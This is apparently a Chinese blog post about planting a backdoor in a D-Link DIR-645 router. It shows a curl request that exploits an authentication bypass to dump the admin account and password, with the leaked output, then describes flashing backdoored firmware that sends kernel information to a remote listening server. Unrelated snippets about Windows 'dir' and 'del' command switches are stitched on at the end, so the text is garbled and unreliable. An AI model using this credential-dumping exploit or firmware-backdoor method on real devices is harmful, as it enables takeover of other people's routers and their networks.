# dir-645後門植入
dir-645有乙個遠端身份繞過的漏洞,可以post一些制定引數到路由器從而拿到密碼
獲取管理員密碼:通過上面那個漏洞獲取到管理員的賬號密碼
zhangbo@zhangbodemacbook-air ~> curl -d services=device.account其中一欄顯示了admin的賬號密碼<?xml version="1.0" encoding="utf-8"?>
device.account
dir-645 2
22usr-
admin
ku-820_fa(2015)
0usr-1
user
1010
0600
12816
zhangbo@zhangbodemacbook-air ~>
usr-使用得到的密碼登入路由,提示登入成功admin
ku-820_fa(2015)
0
之後將韌體壓縮成乙個有後門的bin檔案,使用路由器管理介面的韌體上傳將後門韌體更新上去。(遠端伺服器已經在監聽http訪問日誌) 等待上傳完成之後就可以看到有日誌記錄了。可以看到test頁面的test引數返回了路由器的核心資訊,因為test.php這個頁面是不存在的 所以是404.
使用另外乙個漏洞遠端連線到路由器,在路由器內使用命令可以看到核心資訊和返回的資訊時一樣的。證明後門植入成功
以上僅是測試,測試完畢之後已經刷回官方韌體。
DIR後的 W O S P引數都是什麼意思
在命令列上輸入 dir 的含義 p 表示分頁顯示 w 表示寬格式顯示 o 分類顯示檔案 s 顯示指定目錄和所有子目錄中的檔案。del 刪除命令。f 強制刪除唯讀檔案。s 從所有子目錄刪除指定檔案。q 安靜模式。刪除全域性萬用字元時,不要求確認。systemdrive 系統資料夾,如c windows...
dir對檔案排序後寫入到記錄檔案,檔名稱混亂問題
dir b test.txt 這樣寫的,儲存目錄的檔名後,是正常排序的,但今天發現就亂了!硬碟目錄下檔案是這樣排序的 1.txt 2.txt 3.txt 4.txt 13.txt 14.txt 但命令生成txt檔案後,排序就是也是按公升序排的,但成這種情況 1.txt 13.txt 14.txt 2...